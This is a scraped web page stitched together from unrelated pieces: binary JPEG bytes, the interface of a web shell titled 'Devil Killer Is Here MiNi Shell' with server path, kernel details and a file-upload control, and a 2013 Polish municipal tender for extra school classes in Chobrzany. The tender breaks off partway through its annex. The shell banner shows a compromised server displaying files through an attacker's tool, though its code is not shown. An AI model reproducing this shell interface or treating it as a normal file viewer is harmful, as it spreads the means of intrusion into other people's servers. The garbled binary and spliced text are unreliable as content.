JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130902/353428-N-2013.html

<p class="kh_header"><b>Samborzec: Przeprowadzenie zajęć dodatkowych w gimnazjum w Chobrzanach oraz zarządzanie projektem w ramach realizacji projektu Równe szanse - pewny sukces!  w latach 2013 - 2015</b><br>
<b>Numer ogłoszenia: 353428 - 2013; data zamieszczenia: 02.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Samborzec , Samborzec 43, 27-650 Samborzec, woj. świętokrzyskie, tel. 015 8314443, faks 015 8314583.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.samborzec.asi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dodatkowych w gimnazjum w Chobrzanach oraz zarządzanie projektem w ramach realizacji projektu Równe szanse - pewny sukces!  w latach 2013 - 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie dodatkowych zajęć dla uczestników projektu oraz spotkania indywidualne w ramach Szkolnego Ośrodka Kariery w latach szkolnych 2013/14 i 2014/15 w gimnazjum wchodzącym w skład Zespołu Placówek Oświatowych w Chobrzanach, gmina Samborzec, woj. świętokrzyskie, oraz koordynowanie działań projektowych przez koordynatora i asystenta koordynatora na wszystkich etapach realizacji  projektu Równe szanse - pewny sukces do dnia 30.06.2015 r. 
Projekt  Równe szanse - pewny sukces nr WND-POKL.09.01.02-26-173/13 realizowany jest przez Gminę Samborzec / Zespół Placówek Oświatowych w Chobrzanach i jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet IX - Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Zamówienie obejmuje przeprowadzenie zajęć dodatkowych w liczbie 1 800 godzin lekcyjnych z 5 przedmiotów dla 3 grup uczniów gimnazjum - ogółem dla 70 uczniów, spotkań w ramach SOK (organizacja indywidualnego doradztwa zawodowego dla 70 uczniów gimnazjum w liczbie 5 godzin na osobę, łącznie 350 godzin lekcyjnych) oraz koordynację projektu przez Zespół Zarządzający w okresie 22 miesięcy (w szacunkowej liczbie 3 520 godzin zegarowych).

1.1. Do obowiązków wykonawcy realizującego zajęcia dydaktyczne w ramach części 1-6 należeć będzie:
a)	opracowanie i przeprowadzenie diagnozy początkowej, częściowej i końcowej poziomu osiągnięć edukacyjnych uczniów zakwalifikowanych do projektu, w grupach, w których Wykonawca będzie prowadzić zajęcia.
b)	prowadzenie zajęć zgodnie z harmonogramem projektu oraz programem zajęć, stanowiącym załącznik do umowy (program nie dotyczy członków Zespołu SOK). Program zajęć przygotowany przez Wykonawcę powinien być zatwierdzony przez dyrektora szkoły, w której będą prowadzone zajęcia, i przedstawiony w ciągu 5 dni od dnia otrzymania zawiadomienia o wyborze jego oferty,
c)	przeprowadzanie ewaluacji realizowanych zajęć,
d)	dokumentowanie zajęć i spotkań w dzienniku zajęć i kartach czasu pracy lub dziennikach obserwacji ucznia,
e)	prowadzenie list obecności uczestników projektu,
f)	przygotowanie i przedłożenie koordynatorowi projektu sprawozdań kwartalnych i rocznych
z realizacji zajęć i spotkań indywidualnych w ramach SOK,
g)	przygotowanie dla uczniów zaświadczeń o uczestnictwie w prowadzonych zajęciach, a w przypadku Zespołu SOK raportów dla każdego uczestnika,
h)	ponoszenie odpowiedzialności za bezpieczeństwo uczestników zajęć w czasie ich trwania,
i)	bieżące informowanie zespołu zarządzającego projektem o problemach mogących mieć wpływ na terminową lub prawidłową realizację przedmiotu umowy, 
j)	dbanie o estetyczny wygląd pomieszczeń, w których prowadzone są zajęcia oraz o powierzone pomoce  dydaktyczne i sprzęt komputerowy,
k)	ochrona danych osobowych uczestników projektu zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.).
l)	promocja  projektu - informowanie o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, przestrzeganie Wytycznych dotyczących oznaczenia projektu w dokumentacji dotyczącej projektu oraz miejscu realizacji zajęć.

1.2. Do obowiązków koordynatora i jego asystenta,  realizowanych w ramach części 7, należeć będzie: 
a)	koordynowanie realizacji projektu zgodnie z wnioskiem aplikacyjnym, w tym budżetem i harmonogramem, z zawartą umową o dofinansowanie projektu oraz przepisami krajowymi i Unii Europejskiej i kontrola osiągnięcia wskaźników realizacji projektu,
b)	monitorowanie realizowanych zajęć, w szczególności nadzorowanie jakości działań edukacyjnych prowadzonych w ramach projektu przez wykonawców
c)	obecność jednego z członków zespołu zarządzającego w Zespole Placówek Oświatowych w Chobrzanach w dniu realizacji zajęć edukacyjnych,
d)	uzyskanie zgody rodziców na uczestnictwo dziecka w zajęciach i przetwarzanie jego danych osobowych,
e)	utrzymywanie stałego kontaktu z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco Zamawiającego o wszystkich zaistniałych problemach i zmianach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, 
f)	przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy o dofinansowanie projektu, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów, w tym prowadzenie miesięcznych kart czasu pracy 
g)	rozliczanie merytoryczne i finansowe projektu, w tym przygotowywanie:
- wniosków o płatności pośrednie i płatność końcową wraz z wszystkimi wymaganymi umową załącznikami, 
-  informacji o wszystkich uczestnikach projektu zgodnie z zakresem określonym w umowie o dofinansowanie projektu, 
- okresowych sprawozdań, 
- aktualizacje harmonogramu płatności, 
- informacje i wyjaśnienia związane z realizacją projektu. 
h)	poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu przy obowiązkowej obecności zespołu zarządzającego podczas kontroli projektu. 
i)	prawidłowe przetwarzanie danych osobowych uczestników projektu zgodnie z Ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz.U. Z 2002r. Nr 101, poz. 926 z późn. zm.)
j)	prowadzenie działań informacyjnych i promocyjnych o finansowaniu projektu przez Unię Europejska zgodnie z warunkami, o których mowa w rozporządzeniu Rady (WE) nr 1083/2006 ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności. 
k)	prowadzenie dokumentacji projektu, realizowanych działań, jego realizatorów i uczestników oraz przygotowanie dokumentów do archiwizacji,
l)	tworzenie i bieżąca aktualizacja bazy danych o uczestnikach projektu, obsługa systemu PEFS (Podsystem Monitorowania Europejskiego Funduszu Społecznego)
m)	kontrola wydatkowania środków w ramach projektu. 
2. Zamawiający dopuszcza możliwości składania ofert częściowych. 
Wyodrębniono 7 części zamówienia.
Część 1: 
Zajęcia dydaktyczno-wyrównawcze z matematyki z wykorzystaniem ICT - 360 godzin lekcyjnych (3 grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 35 uczniów G.
Zajęcia prowadzone w formie pogadanek z elementami wykładu, pracy w grupach, pracy z tekstem. Nacisk kładziony będzie na czytanie ze zrozumieniem, wyszukiwanie informacji, interpretowanie tekstów, wyszukiwanie związków przyczynowo - skutkowych, logicznego argumentowania i formułowania wypowiedzi, autoprezentacji, analizy kontekstów, redagowania tekstów informacyjnych  i perswazyjnych. 
Część 2: 
Zajęcia dydaktyczno- wyrównawcze z j. polskiego - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 35uczniów G.
Zajęcia prowadzone w formie ćwiczeń, nacisk kładziony  na wyrobienie sprawności rachunkowej oraz opanowanie podstawowych wiadomości i umiejętności koniecznych do kontynuowania nauki w szkole średniej. Zwrócona będzie uwaga na logiczne rozumowanie i argumentowanie rozwiązanego problemu.
Część 3: 
Zajęcia rozwojowe z j. angielskiego z wykorzystaniem ICT - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 30 uczniów G.
Zajęcia z naciskiem na kształcenie niezależności w myśleniu, ocenę i działania w połączeniu z umiejętnościami sprawnego i odpowiedzialnego komunikowania się w języku obcym. Podczas zajęć stosowane będą ćwiczenia z programami multimedialnymi oraz tablice interaktywne. 
Część 4: 
Zajęcia rozwojowe z j. niemieckiego z wykorzystaniem ICT - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 30 uczniów G.
Zajęcia z naciskiem na kształcenie niezależności w myśleniu, ocenę i działania w połączeniu z umiejętnościami sprawnego i odpowiedzialnego komunikowania się w języku obcym. Podczas zajęć stosowane będą ćwiczenia z programami multimedialnymi oraz tablice interaktywne. 
Część 5:
 Zajęcia rozwojowe kształtujące świadomość obywatelską- 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów  z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 20 uczniów G.
Pogadanki i wykłady na temat charakteru społeczności lokalnej, roli samorządu, inicjatyw lokalnych i roli społeczeństwa obywatelskiego. Planowane są udziały w sesji rady gminy, w rozprawach sądowych czy spotkania z przedstawicielami władz lokalnych. Planowane są symulacje rozprawy sądowej i sesji rady. Zorganizowane zostaną wybory młodzieżowe do europarlamentu i kampania profrekwencyjna w środowisku lokalnym.  
Część 6:
 Spotkania uczniów z doradcą zawodowym w ramach Szkolnego Ośrodka Kariery - 350 godzin spotkań z uczniami kl. I-III G w Chobrzanach. W ramach spotkań 70 uczniów gimnazjum odbędzie po 5 godzin indywidualnych spotkań z doradcą zawodowym.
W ramach zadania utworzony zostanie Szkolny Ośrodek Kariery, w którym uczniowie będą poznawać swój potencjał w kontekście możliwości rozwojowych, poznawać swoje atuty, uczyć się zarządzać swoją karierą. Uczniowie otrzymają teczki (Indywidualny Planer Kariery) w oparciu o które będą poznawać metody autoprezentacji oraz naucza się przygotowywać dokumenty aplikacyjne. Zajęcia mają na celu rozwijanie postaw przedsiębiorczości  i pomoc w radzeniu sobie w trudnych sytuacjach. Ponadto przygotują młodzież do trafnego wyboru zawodu, drogi kształcenia, roli pracownika.
Część 7 Koordynowanie działań projektowych:
1. przez koordynatora projektu - 22 miesiące (średnio 100h miesięcznie, łącznie 2200 godzin w okresie realizacji projektu w ZPO w Chobrzanach), 
2. przez asystenta koordynatora - 22 miesiące (średnio 60h miesięcznie, 1320 godzin w okresie realizacji projektu w ZPO w Chobrzanach).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających polegających na realizacji dodatkowych zajęć dydaktycznych o wartości do 20% zamówienia podstawowego w przypadku powstania oszczędności w trakcie realizacji projektu oraz stwierdzenia takiej potrzeby w trakcie ewaluacji realizowanych zajęć</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 79.42.10.00-1, 75.11.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli:
- wykonawca części od 1 do 6 dysponuje osobami, które posiadają min. 1 rok pracy w zawodzie nauczyciela przedmiotu, którego dotyczy składana oferta, oraz posiadają kwalifikacje zgodne z rozporządzeniem MEN z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U z 2009 r. nr 50, poz. 400 z późn. zm.).
- wykonawca części 7 dysponuje osobami, które posiadają wykształcenie wyższe, min. 1 rok doświadczenia w zarządzaniu placówką oświatową/ szkoleniową lub kurs/studia podyplomowe w zakresie zarządzania oświatą lub zarządzania projektem społecznym, a co  najmniej jeden z członków zespołu zarządzającego posiada doświadczenie w koordynowaniu co najmniej jednego projektu edukacyjnego dofinansowanego ze środków unijnych.
Dysponowanie osobą zdolną do wykonania zamówienia oznacza także bycie przez Wykonawcę taką osobą, o ile wykonawca zamierza realizować zamówienie osobiście.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy- wypełniony i podpisany przez wykonawcę; - pełnomocnictwo do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy, jeżeli wykonawcy wspólnie ubiegają się o udzielenie zamówienia; -pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów (wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych) na okres korzystania z nich przy wykonywaniu zamówienia - w sytuacji polegania przez Wykonawcę na zasobach innych podmiotów, -dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przepisów prawa lub przedstawionych dokumentów rejestrowych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.samborzec.asi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Samborcu
Samborzec 43
27-650 Samborzec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2013 godzina 13:00, miejsce: Urząd Gminy w Samborcu
Samborzec 43
27-650 Samborzec
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Równe szanse - pewny sukces nr WND-POKL.09.01.02-26-173/13 realizowany jest przez Gminę Samborzec / Zespół Placówek Oświatowych w Chobrzanach i jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet IX - Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z matematyki z wykorzystaniem ICT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dydaktyczno-wyrównawcze z matematyki z wykorzystaniem ICT - 360 godzin lekcyjnych (3 grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 35 uczniów G.
Zajęcia prowadzone w formie pogadanek z elementami wykładu, pracy w grupach, pracy z tekstem. Nacisk kładziony będzie na czytanie ze zrozumieniem, wyszukiwanie informacji, interpretowanie tekstów, wyszukiwanie związków przyczynowo - skutkowych, logicznego argumentowania i formułowania wypowiedzi, autoprezentacji, analizy kontekstów, redagowania tekstów informacyjnych  i perswazyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z j. polskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dydaktyczno- wyrównawcze z j. polskiego - 360 godzin lekcyjnych (3grupy x 60 godz. w jednym roku szkolnym x 2 lata szkolne). Zajęcia będą realizowane w trzech grupach wiekowych uczniów z kl. I-III gimnazjum w Chobrzanach. Zajęciami będzie objętych 35uczniów G.
Zajęcia prowadzone w formie ćwiczeń, nacisk kładziony  na wyrobienie sprawności rachunkowej oraz opanowanie podstawowych wiadomości i umiejętności koniecznych do kontynuowania nauki w szkole średniej. Zwrócona będzie uwaga na logiczne rozumowanie i argumentowanie rozwiązanego problemu.</p></li>
